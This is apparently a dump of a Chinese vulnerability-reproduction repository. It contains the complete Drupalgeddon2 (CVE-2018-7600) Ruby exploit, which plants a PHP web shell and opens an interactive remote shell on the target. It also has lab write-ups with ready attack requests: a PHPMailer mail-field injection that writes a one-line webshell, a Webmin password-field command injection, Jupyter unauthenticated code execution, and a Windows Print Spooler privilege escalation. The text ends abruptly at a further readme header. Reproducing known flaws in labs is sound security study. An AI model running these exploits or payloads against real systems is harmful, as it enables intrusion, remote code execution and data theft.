├── 2020_09_09_Drupal远程代码执行漏洞(CVE-2018-7600) ├── 0.png ├── drupalggedon2.rb └── readme.md ├── 2020_09_09_Jupyter Notebook未授权访问漏洞复现 ├── 0.png ├── 1.png └── readme.md ├── 2020_09_09_PHPMailer远程命令执行漏洞复现(CVE-2016-10033) ├── 0.png └── readme.md ├── 2020_09_09_Webmin远程命令执行漏洞复现(CVE-2019-15107) ├── 0.png ├── 1.png └── readme.md ├── 2020_09_09_Windows Print Spooler权限提升漏洞(CVE-2020-1337) ├── 0.png ├── cve-2020-1337-poc-master.zip └── readme.md ├── 2020_10_09_Apache Flink任意jar包上传漏洞复现 ├── 0.png ├── 1.png ├── 2.png ├── 3.png ├── 4.png └── readme.md ├── 2020_10_09_Apache Solr远程代码执行漏洞复现(CVE-2019-12409) ├── 1.png ├── 2.png └── readme.md ├── 2020_10_12_RedHat 5.4权限提升漏洞复现(CVE-2010-3847) ├── b1.png ├── cve-2010-3847.sh └── readme.md ├── 2020_10_13_Tomcat任意文件写入漏洞复现(CVE-2017-12615) ├── f0.png ├── f1.png └── readme.md ├── 2020_10_15_(未复现)VMware vCenter未验证的任意文件读取漏洞 └── readme.md ├── 2020_10_19_ThinkAdmin列目录和任意文件读取漏洞复现(CVE-2020-25540) ├── 0.png ├── 1.png ├── 2.png └── readme.md ├── 2020_10_26_如何绕过“请在微信客户端打开链接”的限制 ├── 0.png ├── 1.png ├── 2.png ├── 3.png ├── 4.png └── readme.md ├── 2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935) ├── WebSocketClient.js ├── WebSocketServlet.java ├── a.png ├── a0.png ├── a1.png ├── a2.png ├── a3.png ├── b.png ├── c.png ├── d.png ├── e.png ├── f.png ├── readme.md └── tcdos ├── 2020_11_11_Citrix远程代码执行漏洞复现(CVE-2019-19781) ├── 0.png ├── CVE-2019-19781.zip └── readme.md ├── 2020_11_11_Discuz 7.x 6.x 全局变量防御绕过导致远程代码执行 ├── 0.png └── readme.md ├── 2020_11_11_Supervisord远程代码执行漏洞复现(CVE-2017-11610) ├── 0.png ├── poc.py └── readme.md ├── 2020_11_11_ThinkCMF远程代码执行漏洞复现 ├── 0.png ├── 1.png ├── ThinkCMFX_2.2.3.zip └── readme.md ├── 2020_11_11_Windows SMBv3本地权限提升漏洞复现(CVE-2020-0796) ├── 0.png ├── cve-2020-0796-local提权工具.exe └── readme.md ├── 2020_11_11_Windows UAC本地权限提升漏洞(CVE-2019-1388) ├── 0.png ├── 1.png ├── 2.png ├── 3.png ├── 4.png ├── 5.png ├── 6.png ├── hhupd.exe └── readme.md ├── 2020_11_11_phpstudy后门漏洞复现 ├── 0.png ├── 1.png └── readme.md ├── 2020_11_11_“git泄漏”漏洞复现 
├── 0.png ├── 1.png ├── GitHack-master.zip └── readme.md ├── 2020_11_12_Tomcat JmxRemoteLifecycleListener远程代码执行漏洞复现(CVE-2016-8735) ├── a0.png ├── a1.png ├── a2.png ├── a3.png ├── a4.png └── readme.md ├── 2020_11_13_Microsoft SQL Server Reporting Services权限提升漏洞复现(CVE-2020-0618) └── readme.md ├── 2020_11_13_PHPUnit远程代码执行漏洞复现(CVE-2017-9841) ├── 0.png ├── 1.png └── readme.md ├── 2020_11_13_iis6.0(cve-2017-7269)最完整的利用,从远程利用,到本地提权,再到常见失败原因 └── readme.md ├── 2020_11_15_Windows RDP服务远程代码执行漏洞复现(CVE-2019-0708)-BlueKeep ├── cve_2019_0708_bluekeep.rb ├── cve_2019_0708_bluekeep_rce.rb ├── rdp.rb ├── rdp_scanner.rb └── readme.md ├── 2020_11_18_Citrix XenMobile目录遍历漏洞复现(CVE-2020-8209) ├── 0.png ├── 1.png └── readme.md ├── 2020_12_10_(未成功)Microsoft Exchange Server 2010远程代码执行漏洞复现(CVE-2020-17144) ├── 0.png ├── CVE-2020-17144.exe └── readme.md ├── 2020_12_17_S2-061远程代码执行漏洞复现(CVE-2020-17530) ├── 0.png ├── 1.png ├── 2.png ├── 3.png ├── 4.png ├── 5.png ├── 6.png ├── readme.md ├── s2-061-batch-detect-exp.py └── s2-061-batch-detect.py ├── 2021_01_10_通达OA未授权访问+文件上传导致RCE ├── 0.png └── readme.md ├── 2021_01_11_ThinkPHP远程命令执行漏洞复现 ├── 0.png ├── readme.md └── thinkphp版本总结.txt ├── 2021_01_18_JumpServer远程代码执行漏洞 ├── 0.png ├── a0.png ├── a1.png ├── jumpserver-rce.py ├── quick_start.sh └── readme.md ├── 2021_01_27_SonicWall SSL-VPN远程命令执行漏洞复现 ├── 0.png ├── 1.png ├── batch-detect.py ├── readme.md └── urls.txt ├── 2021_02_06_Linux sudo权限提升漏洞复现(CVE-2021-3156) ├── CVE-2021-3156.zip ├── a0.png ├── a1.png ├── b0.png ├── b1.png ├── c0.png └── readme.md ├── 2021_02_24_WebLogic远程命令执行漏洞复现(CVE-2021-2109) ├── 0.png └── readme.md ├── 2021_02_28_VMware vCenter Server未授权文件上传导致RCE漏洞复现 ├── pic │ ├── 0.png │ └── readme.md └── readme.md └── README.md /2020_09_09_Drupal远程代码执行漏洞(CVE-2018-7600)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_09_09_Drupal远程代码执行漏洞(CVE-2018-7600)/0.png 
-------------------------------------------------------------------------------- /2020_09_09_Drupal远程代码执行漏洞(CVE-2018-7600)/drupalggedon2.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | # 3 | # [CVE-2018-7600] Drupal <= 8.5.0 / <= 8.4.5 / <= 8.3.8 / 7.23 <= 7.57 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/ 4 | # 5 | # Authors: 6 | # - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked 7 | # - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k 8 | # 9 | 10 | 11 | require 'base64' 12 | require 'json' 13 | require 'net/http' 14 | require 'openssl' 15 | require 'readline' 16 | require 'highline/import' 17 | 18 | 19 | # Settings - Try to write a PHP to the web root? 20 | try_phpshell = true 21 | # Settings - General/Stealth 22 | $useragent = "drupalgeddon2" 23 | webshell = "shell.php" 24 | # Settings - Proxy information (nil to disable) 25 | $proxy_addr = nil 26 | $proxy_port = 8080 27 | 28 | 29 | # Settings - Payload (we could just be happy without this PHP shell, by using just the OS shell - but this is 'better'!) 30 | bashcmd = "&1' ); }" 31 | bashcmd = "echo " + Base64.strict_encode64(bashcmd) + " | base64 -d" 32 | 33 | 34 | # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 35 | 36 | 37 | # Function http_request [type] [data] 38 | def http_request(url, type="get", payload="", cookie="") 39 | puts verbose("HTTP - URL : #{url}") if $verbose 40 | puts verbose("HTTP - Type: #{type}") if $verbose 41 | puts verbose("HTTP - Data: #{payload}") if not payload.empty? and $verbose 42 | 43 | begin 44 | uri = URI(url) 45 | request = type =~ /get/? Net::HTTP::Get.new(uri.request_uri) : Net::HTTP::Post.new(uri.request_uri) 46 | request.initialize_http_header({"User-Agent" => $useragent}) 47 | request.initialize_http_header("Cookie" => cookie) if not cookie.empty? 
48 | request.body = payload if not payload.empty? 49 | return $http.request(request) 50 | rescue SocketError 51 | puts error("Network connectivity issue") 52 | rescue Errno::ECONNREFUSED => e 53 | puts error("The target is down ~ #{e.message}") 54 | puts error("Maybe try disabling the proxy (#{$proxy_addr}:#{$proxy_port})...") if $proxy_addr 55 | rescue Timeout::Error => e 56 | puts error("The target timed out ~ #{e.message}") 57 | end 58 | 59 | # If we got here, something went wrong. 60 | exit 61 | end 62 | 63 | 64 | # Function gen_evil_url [method] [shell] [phpfunction] 65 | def gen_evil_url(evil, element="", shell=false, phpfunction="passthru") 66 | puts info("Payload: #{evil}") if not shell 67 | puts verbose("Element : #{element}") if not shell and not element.empty? and $verbose 68 | puts verbose("PHP fn : #{phpfunction}") if not shell and $verbose 69 | 70 | # Vulnerable parameters: #access_callback / #lazy_builder / #pre_render / #post_render 71 | # Check the version to match the payload 72 | if $drupalverion.start_with?("8") and element == "mail" 73 | # Method #1 - Drupal v8.x: mail, #post_render - HTTP 200 74 | url = $target + $clean_url + $form + "?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" 75 | payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpfunction + "&mail[a][#type]=markup&mail[a][#markup]=" + evil 76 | 77 | elsif $drupalverion.start_with?("8") and element == "timezone" 78 | # Method #2 - Drupal v8.x: timezone, #lazy_builder - HTTP 500 if phpfunction=exec // HTTP 200 if phpfunction=passthru 79 | url = $target + $clean_url + $form + "?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax" 80 | payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=" + phpfunction + "&timezone[a][#lazy_builder][][]=" + evil 81 | 82 | #puts warning("WARNING: May benefit to use a PHP web shell") if not try_phpshell and phpfunction != "passthru" 83 
| 84 | elsif $drupalverion.start_with?("7") and element == "name" 85 | # Method #3 - Drupal v7.x: name, #post_render - HTTP 200 86 | url = $target + "#{$clean_url}#{$form}&name[%23post_render][]=" + phpfunction + "&name[%23type]=markup&name[%23markup]=" + evil 87 | payload = "form_id=user_pass&_triggering_element_name=name" 88 | end 89 | 90 | # Drupal v7.x needs an extra value from a form 91 | if $drupalverion.start_with?("7") 92 | response = http_request(url, "post", payload, $session_cookie) 93 | 94 | form_name = "form_build_id" 95 | puts verbose("Form name : #{form_name}") if $verbose 96 | 97 | form_value = response.body.match(/input type="hidden" name="#{form_name}" value="(.*)"/).to_s.slice(/value="(.*)"/, 1).to_s.strip 98 | puts warning("WARNING: Didn't detect #{form_name}") if form_value.empty? 99 | puts verbose("Form value : #{form_value}") if $verbose 100 | 101 | url = $target + "#{$clean_url}file/ajax/name/%23value/" + form_value 102 | payload = "#{form_name}=#{form_value}" 103 | end 104 | 105 | return url, payload 106 | end 107 | 108 | 109 | # Function clean_result 110 | def clean_result(input) 111 | #result = JSON.pretty_generate(JSON[response.body]) 112 | #result = $drupalverion.start_with?("8")? 
JSON.parse(clean)[0]["data"] : clean 113 | clean = input.to_s.strip 114 | 115 | # PHP function: passthru 116 | # For: [{"command":"insert","method":"replaceWith","selector":null,"data":"\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E","settings":null}] 117 | clean.slice!(/\[{"command":".*}\]$/) 118 | 119 | # PHP function: exec 120 | # For: [{"command":"insert","method":"replaceWith","selector":null,"data":"\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C\/span\u003E","settings":null}] 121 | #clean.slice!(/\[{"command":".*data":"/) 122 | #clean.slice!(/\\u003Cspan class=\\u0022.*}\]$/) 123 | 124 | # Newer PHP for an older Drupal 125 | # For: Deprecated: assert(): Calling assert() with a string argument is deprecated in /var/www/html/core/lib/Drupal/Core/Plugin/DefaultPluginManager.php on line 151
126 | #clean.slice!(/.*
/) 127 | 128 | # Drupal v8.x Method #2 ~ timezone, #lazy_builder, passthru, HTTP 500 129 | # For: Deprecated: assert(): Calling assert() with a string argument is deprecated in /var/www/html/core/lib/Drupal/Core/Plugin/DefaultPluginManager.php on line 151
130 | clean.slice!(/The website encountered an unexpected error.*/) 131 | 132 | return clean 133 | end 134 | 135 | 136 | # Feedback when something goes right 137 | def success(text) 138 | # Green 139 | return "\e[#{32}m[+]\e[0m #{text}" 140 | end 141 | 142 | # Feedback when something goes wrong 143 | def error(text) 144 | # Red 145 | return "\e[#{31}m[-]\e[0m #{text}" 146 | end 147 | 148 | # Feedback when something may have issues 149 | def warning(text) 150 | # Yellow 151 | return "\e[#{33}m[!]\e[0m #{text}" 152 | end 153 | 154 | # Feedback when something doing something 155 | def action(text) 156 | # Blue 157 | return "\e[#{34}m[*]\e[0m #{text}" 158 | end 159 | 160 | # Feedback with helpful information 161 | def info(text) 162 | # Light blue 163 | return "\e[#{94}m[i]\e[0m #{text}" 164 | end 165 | 166 | # Feedback for the overkill 167 | def verbose(text) 168 | # Dark grey 169 | return "\e[#{90}m[v]\e[0m #{text}" 170 | end 171 | 172 | 173 | # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 174 | 175 | def init_authentication() 176 | $uname = ask('Enter your username: ') { |q| q.echo = false } 177 | $passwd = ask('Enter your password: ') { |q| q.echo = false } 178 | $uname_field = ask('Enter the name of the username form field: ') { |q| q.echo = true } 179 | $passwd_field = ask('Enter the name of the password form field: ') { |q| q.echo = true } 180 | $login_path = ask('Enter your login path (e.g., user/login): ') { |q| q.echo = true } 181 | $creds_suffix = ask('Enter the suffix eventually required after the credentials in the login HTTP POST request (e.g., &form_id=...): ') { |q| q.echo = true } 182 | end 183 | 184 | def is_arg(args, param) 185 | args.each do |arg| 186 | if arg == param 187 | return true 188 | end 189 | end 190 | return false 191 | end 192 | 193 | 194 | # Quick how to use 195 | def usage() 196 | puts 'Usage: ruby drupalggedon2.rb [--authentication] [--verbose]' 197 | puts 'Example for target that does not require 
authentication:' 198 | puts ' ruby drupalgeddon2.rb https://example.com' 199 | puts 'Example for target that does require authentication:' 200 | puts ' ruby drupalgeddon2.rb https://example.com --authentication' 201 | end 202 | 203 | 204 | # Read in values 205 | if ARGV.empty? 206 | usage() 207 | exit 208 | end 209 | 210 | $target = ARGV[0] 211 | init_authentication() if is_arg(ARGV, '--authentication') 212 | $verbose = is_arg(ARGV, '--verbose') 213 | 214 | 215 | # Check input for protocol 216 | $target = "http://#{$target}" if not $target.start_with?("http") 217 | # Check input for the end 218 | $target += "/" if not $target.end_with?("/") 219 | 220 | 221 | # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 222 | 223 | 224 | # Banner 225 | puts action("--==[::#Drupalggedon2::]==--") 226 | puts "-"*80 227 | puts info("Target : #{$target}") 228 | puts info("Proxy : #{$proxy_addr}:#{$proxy_port}") if $proxy_addr 229 | puts info("Write? : Skipping writing PHP web shell") if not try_phpshell 230 | puts "-"*80 231 | 232 | 233 | # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 234 | 235 | 236 | # Setup connection 237 | uri = URI($target) 238 | $http = Net::HTTP.new(uri.host, uri.port, $proxy_addr, $proxy_port) 239 | 240 | # Use SSL/TLS if needed 241 | if uri.scheme == "https" 242 | $http.use_ssl = true 243 | $http.verify_mode = OpenSSL::SSL::VERIFY_NONE 244 | end 245 | 246 | $session_cookie = '' 247 | # If authentication required then login and get session cookie 248 | if $uname 249 | $payload = $uname_field + '=' + $uname + '&' + $passwd_field + '=' + $passwd + $creds_suffix 250 | response = http_request($target + $login_path, 'post', $payload, $session_cookie) 251 | if (response.code == '200' or response.code == '303') and not response.body.empty? 
and response['set-cookie'] 252 | $session_cookie = response['set-cookie'].split('; ')[0] 253 | puts success("Logged in - Session Cookie : #{$session_cookie}") 254 | end 255 | 256 | end 257 | 258 | # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 259 | 260 | 261 | # Try and get version 262 | $drupalverion = "" 263 | 264 | # Possible URLs 265 | url = [ 266 | # --- changelog --- 267 | # Drupal v6.x / v7.x [200] 268 | $target + "CHANGELOG.txt", 269 | # Drupal v8.x [200] 270 | $target + "core/CHANGELOG.txt", 271 | 272 | # --- bootstrap --- 273 | # Drupal v7.x / v6.x [403] 274 | $target + "includes/bootstrap.inc", 275 | # Drupal v8.x [403] 276 | $target + "core/includes/bootstrap.inc", 277 | 278 | # --- database --- 279 | # Drupal v7.x / v6.x [403] 280 | $target + "includes/database.inc", 281 | # Drupal v7.x [403] 282 | #$target + "includes/database/database.inc", 283 | # Drupal v8.x [403] 284 | #$target + "core/includes/database.inc", 285 | 286 | # --- landing page --- 287 | # Drupal v8.x / v7.x [200] 288 | $target, 289 | ] 290 | 291 | # Check all 292 | url.each do|uri| 293 | # Check response 294 | response = http_request(uri, 'get', '', $session_cookie) 295 | 296 | # Check header 297 | if response['X-Generator'] and $drupalverion.empty? 298 | header = response['X-Generator'].slice(/Drupal (.*) \(https:\/\/www.drupal.org\)/, 1).to_s.strip 299 | 300 | if not header.empty? 301 | $drupalverion = "#{header}.x" if $drupalverion.empty? 302 | puts success("Header : v#{header} [X-Generator]") 303 | puts verbose("X-Generator: #{response['X-Generator']}") if $verbose 304 | end 305 | end 306 | 307 | # Check request response, valid 308 | if response.code == "200" 309 | tmp = $verbose ? " [HTTP Size: #{response.size}]" : "" 310 | puts success("Found : #{uri} (HTTP Response: #{response.code})#{tmp}") 311 | 312 | # Check to see if it says: The requested URL "http://" was not found on this server. 
313 | puts warning("WARNING: Could be a false-positive [1-1], as the file could be reported to be missing") if response.body.downcase.include? "was not found on this server" 314 | 315 | # Check to see if it says:

Page not found

The requested page could not be found.
316 | puts warning("WARNING: Could be a false-positive [1-2], as the file could be reported to be missing") if response.body.downcase.include? "the requested page could not be found" 317 | 318 | # Only works for CHANGELOG.txt 319 | if uri.match(/CHANGELOG.txt/) 320 | # Check if valid. Source ~ https://api.drupal.org/api/drupal/core%21CHANGELOG.txt/8.5.x // https://api.drupal.org/api/drupal/CHANGELOG.txt/7.x 321 | puts warning("WARNING: Unable to detect keyword 'drupal.org'") if not response.body.downcase.include? "drupal.org" 322 | 323 | # Patched already? (For Drupal v8.4.x / v7.x) 324 | puts warning("WARNING: Might be patched! Found SA-CORE-2018-002: #{url}") if response.body.include? "SA-CORE-2018-002" 325 | 326 | # Try and get version from the file contents (For Drupal v8.4.x / v7.x) 327 | $drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip 328 | 329 | # Blank if not valid 330 | $drupalverion = "" if not $drupalverion[-1] =~ /\d/ 331 | end 332 | 333 | # Check meta tag 334 | if not response.body.empty? 335 | # For Drupal v8.x / v7.x 336 | meta = response.body.match(/> ", true).to_s 642 | 643 | # Check input 644 | puts warning("WARNING: Detected an known bad character (>)") if command =~ />/ 645 | 646 | # Exit 647 | break if command == "exit" 648 | 649 | # Blank link? 650 | next if command.empty? 651 | 652 | # If PHP web shell 653 | if not webshellpath.empty? 654 | # Send request 655 | result = http_request("#{$target}#{webshellpath}", "post", "c=#{command}", $session_cookie).body 656 | # Direct OS commands 657 | else 658 | url, payload = gen_evil_url(command, $element, true) 659 | response = http_request(url, "post", payload, $session_cookie) 660 | 661 | # Check result 662 | if not response.body.empty? 
663 | result = clean_result(response.body) 664 | end 665 | end 666 | 667 | # Feedback 668 | puts result 669 | end 670 | -------------------------------------------------------------------------------- /2020_09_09_Drupal远程代码执行漏洞(CVE-2018-7600)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600 3 | 4 | # 0x01 利用条件 5 | 无 6 | 7 | # 0x02 影响版本 8 | 7.23<=7.x<=7.57 9 | 8.3.x<=8.3.8 10 | 8.4.x<=8.4.5 11 | 8.5.x<=8.5.0 12 | 13 | # 0x03 漏洞复现 14 | 执行“ruby ./drupalggedon2.rb http://172.16.35.128:8080” 15 | 会返回一个shell,可在返回的shell中执行命令,如下图 16 | ![image](./0.png) 17 | 18 | # 0x04 踩坑记录 19 | 坑1: 20 | 环境创建完之后,使用kali下的firefox访问127.0.0.1:8080时,burp不能抓到数据包,原因未知,解决方案:使用kali下的firefox访问局域网ip“172.16.35.128:8080” 21 | 坑2: 22 | 登录状态下使用vulhub中的poc无效,需要登出后才可执行命令id,vulhub中的poc如下: 23 | ``` 24 | POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1 25 | Host: your-ip:8080 26 | Accept-Encoding: gzip, deflate 27 | Accept: */* 28 | Accept-Language: en 29 | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) 30 | Connection: close 31 | Content-Type: application/x-www-form-urlencoded 32 | Content-Length: 103 33 | 34 | form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id 35 | ``` 36 | 坑3: 37 | 使用vulhub中的poc执行命令“ls”,只能看到一个文件“web.config”,执行命令“ls -a /”也只能看到一个文件“var” 38 | 39 | # 参考链接 40 | https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600 41 | -------------------------------------------------------------------------------- /2020_09_09_Jupyter Notebook未授权访问漏洞复现/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_09_09_Jupyter Notebook未授权访问漏洞复现/0.png 
-------------------------------------------------------------------------------- /2020_09_09_Jupyter Notebook未授权访问漏洞复现/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_09_09_Jupyter Notebook未授权访问漏洞复现/1.png -------------------------------------------------------------------------------- /2020_09_09_Jupyter Notebook未授权访问漏洞复现/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:360众测仿真实战靶场考试 3 | 其他复现环境:https://github.com/vulhub/vulhub/tree/master/jupyter/notebook-rce 4 | 5 | # 0x01 利用条件 6 | 无 7 | 8 | # 0x02 影响版本 9 | 全版本(只要管理员没有为web界面访问配置密码、ip限制等策略,都受影响) 10 | 11 | # 0x03 漏洞复现 12 | 由于考试时没有截图,故下图借用别人的图 13 | 14 | 新建一个terminal窗口,如图 15 | ![image](./0.png) 16 | 直接就RCE了,如图 17 | ![image](./1.png) 18 | 19 | # 0x04 踩坑记录 20 | 无 21 | 22 | # 参考链接 23 | https://www.cnblogs.com/mke2fs/p/12718499.html 24 | -------------------------------------------------------------------------------- /2020_09_09_PHPMailer远程命令执行漏洞复现(CVE-2016-10033)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_09_09_PHPMailer远程命令执行漏洞复现(CVE-2016-10033)/0.png -------------------------------------------------------------------------------- /2020_09_09_PHPMailer远程命令执行漏洞复现(CVE-2016-10033)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:https://www.mozhe.cn/bug/detail/124 3 | 4 | # 0x01 利用条件 5 | 无 6 | 7 | # 0x02 影响版本 8 | PHPMailer<5.2.18 9 | 10 | # 0x03 漏洞复现 11 | 启动墨者学院的靶场环境,看到一个网站,点击底部的“Mail Contact”,进入“http://219.153.49.228:49754/mail.php” 12 | 在name处随便输入比如“aaa”,在email处输入: 13 | ``` 14 | "aaa". -OQueueDirectory=/tmp/. 
-X/var/www/html/a.php @aaa.com 15 | ``` 16 | 在message处输入一句话木马: 17 | ``` 18 | 19 | ``` 20 | 蚁剑链接http://219.153.49.228:49754/a.php ,成功拿到webshell,如下图 21 | ![image](./0.png) 22 | 23 | # 0x04 踩坑记录 24 | 坑1:上传完一句话木马后,页面会响应3-5分钟,响应时间较长 25 | 26 | # 参考链接 27 | https://www.jianshu.com/p/745c82d8b6e0 28 | -------------------------------------------------------------------------------- /2020_09_09_Webmin远程命令执行漏洞复现(CVE-2019-15107)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_09_09_Webmin远程命令执行漏洞复现(CVE-2019-15107)/0.png -------------------------------------------------------------------------------- /2020_09_09_Webmin远程命令执行漏洞复现(CVE-2019-15107)/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_09_09_Webmin远程命令执行漏洞复现(CVE-2019-15107)/1.png -------------------------------------------------------------------------------- /2020_09_09_Webmin远程命令执行漏洞复现(CVE-2019-15107)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:https://www.mozhe.cn/bug/detail/d01lL2RSbGEwZUNTeThVZ0xDdXl0Zz09bW96aGUmozhe 3 | 复现版本:Webmin1.910 4 | 5 | # 0x01 利用条件 6 | 需要开启密码重置功能,如下图 7 | ![image](./0.png) 8 | 查看webmin的配置文件/etc/webmin/miniserv.conf,可以发现passwd_mode的值已经从0变为了2 9 | 10 | # 0x02 影响版本 11 | Webmin<=1.920 12 | 13 | # 0x03 漏洞复现 14 | 随便发起一个请求,burp拦截,修改为如下数据包 15 | ``` 16 | POST /password_change.cgi HTTP/1.1 17 | Host: 219.153.49.228:41489 18 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Accept: text/html, */*; q=0.01 19 | Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 20 | Accept-Encoding: gzip, deflate 21 | Referer: http://219.153.49.228:41489/passwd/index.cgi?xnavigation=1 22 | X-PJAX: true 23 | 
X-PJAX-Container: [data-dcontainer] 24 | X-PJAX-URL: passwd/edit_passwd.cgi?user=root 25 | X-Requested-From: passwd 26 | X-Requested-From-Tab: webmin 27 | X-Requested-With: XMLHttpRequest 28 | Content-Type: text/plain;charset=UTF-8 29 | Content-Length: 60 30 | Connection: close 31 | 32 | user=yibudengtian&old=cat /key.txt&new1=123456&new2=123456 33 | ``` 34 | 35 | # 0x04 踩坑记录 36 | 坑1: 37 | ![image](./1.png) 38 | 39 | # 参考链接 40 | https://xz.aliyun.com/t/6040 41 | https://www.cnblogs.com/paperpen/p/11442532.html 42 | -------------------------------------------------------------------------------- /2020_09_09_Windows Print Spooler权限提升漏洞(CVE-2020-1337)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_09_09_Windows Print Spooler权限提升漏洞(CVE-2020-1337)/0.png -------------------------------------------------------------------------------- /2020_09_09_Windows Print Spooler权限提升漏洞(CVE-2020-1337)/cve-2020-1337-poc-master.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_09_09_Windows Print Spooler权限提升漏洞(CVE-2020-1337)/cve-2020-1337-poc-master.zip -------------------------------------------------------------------------------- /2020_09_09_Windows Print Spooler权限提升漏洞(CVE-2020-1337)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:win10 1909 18363.657 3 | 4 | # 0x01 利用条件 5 | 无 6 | 7 | # 0x02 影响版本 8 | win7、win8.1、win10 9 | 2008、2008 r2、2012、2012 r2、2016、2019 10 | 详细参见:https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1337#ID0EGB 11 | 12 | # 0x03 漏洞复现 13 | 打开一个powershell控制台,查看执行策略“get-executionPolicy”,修改执行策略为最宽松的“set-executionPolicy unrestricted”,先执行.\poc.ps1,再执行.\WerTrigger.exe 14 | ![image](./0.png) 15 | 16 | # 0x04 踩坑记录 
17 | 无 18 | 19 | # 参考链接 20 | https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/ 21 | https://github.com/sailay1996/cve-2020-1337-poc 22 | -------------------------------------------------------------------------------- /2020_10_09_Apache Flink任意jar包上传漏洞复现/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_09_Apache Flink任意jar包上传漏洞复现/0.png -------------------------------------------------------------------------------- /2020_10_09_Apache Flink任意jar包上传漏洞复现/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_09_Apache Flink任意jar包上传漏洞复现/1.png -------------------------------------------------------------------------------- /2020_10_09_Apache Flink任意jar包上传漏洞复现/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_09_Apache Flink任意jar包上传漏洞复现/2.png -------------------------------------------------------------------------------- /2020_10_09_Apache Flink任意jar包上传漏洞复现/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_09_Apache Flink任意jar包上传漏洞复现/3.png -------------------------------------------------------------------------------- /2020_10_09_Apache Flink任意jar包上传漏洞复现/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_09_Apache Flink任意jar包上传漏洞复现/4.png -------------------------------------------------------------------------------- /2020_10_09_Apache Flink任意jar包上传漏洞复现/readme.md: 
